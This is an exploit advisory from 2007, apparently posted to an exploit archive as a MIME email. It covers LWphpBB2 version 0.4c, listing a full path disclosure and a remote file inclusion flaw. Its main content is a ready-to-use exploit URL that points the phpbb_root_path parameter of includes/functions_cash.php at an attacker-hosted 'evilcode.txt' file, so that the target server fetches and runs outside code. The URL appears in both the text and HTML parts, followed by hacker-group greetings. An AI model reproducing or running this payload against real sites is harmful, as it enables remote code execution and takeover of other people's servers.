Home / exploits lwphpbb2-rfi.txt
Posted on 24 April 2007
------=_Part_59592_20650484.1177339131270 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline ********************************** *AuThor:Silitoad * *emA!l:Silitoad[at]hotmail[dot]Com * *HoMePaGe: http://www.Arabian-FighterZ.com<http://www.arabian-fighterz.com/>* ********************************** [Info] LWphpBB2 Version: 0.4c Problem: Full path disclosure,Include file bug: include($phpbb_root_path . 'includes/classes_cash. [Vuls] 1.Full path disclosure: [Exploit] http://target/LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php?phpbb_root_path=http://evilcode.txt ? [Fix] Vuls has been reported to author,No reply yet. [Greetings] Greets To l1nuxm4,Sn1p8r,Sbitar,Op3runix,linux_m,Diabolax,leo,stoorm, ...... eof ------=_Part_59592_20650484.1177339131270 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline <p>**********************************<br>*AuThor:Silitoad *<br>*emA!l:Silitoad[at]hotmail[dot]Com *<br>*HoMePaGe: <a href="http://www.arabian-fighterz.com/">http://www.Arabian-FighterZ.com</a> *<br>********************************** <br> </p> <p><br>[Info]</p> <p>LWphpBB2<br>Version: 0.4c</p> <p>Problem: Full path disclosure,Include file</p> <p>bug: include($phpbb_root_path . 'includes/classes_cash. </p> <p>[Vuls]</p> <p>1.Full path disclosure:</p> <p><br>[Exploit]</p> <p><a href="http://target/LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php?phpbb_root_path=http://evilcode.txt">http://target/LWphpBB2_0.4c/LWphpBB20.4/includes/functions_cash.php?phpbb_root_path=http://evilcode.txt </a>?</p> <p>[Fix]</p> <p>Vuls has been reported to author,No reply yet.</p> <p>[Greetings]</p> <p>Greets To l1nuxm4,Sn1p8r,Sbitar,Op3runix,linux_m,Diabolax,leo,stoorm, ......</p> <p><br>eof</p> ------=_Part_59592_20650484.1177339131270--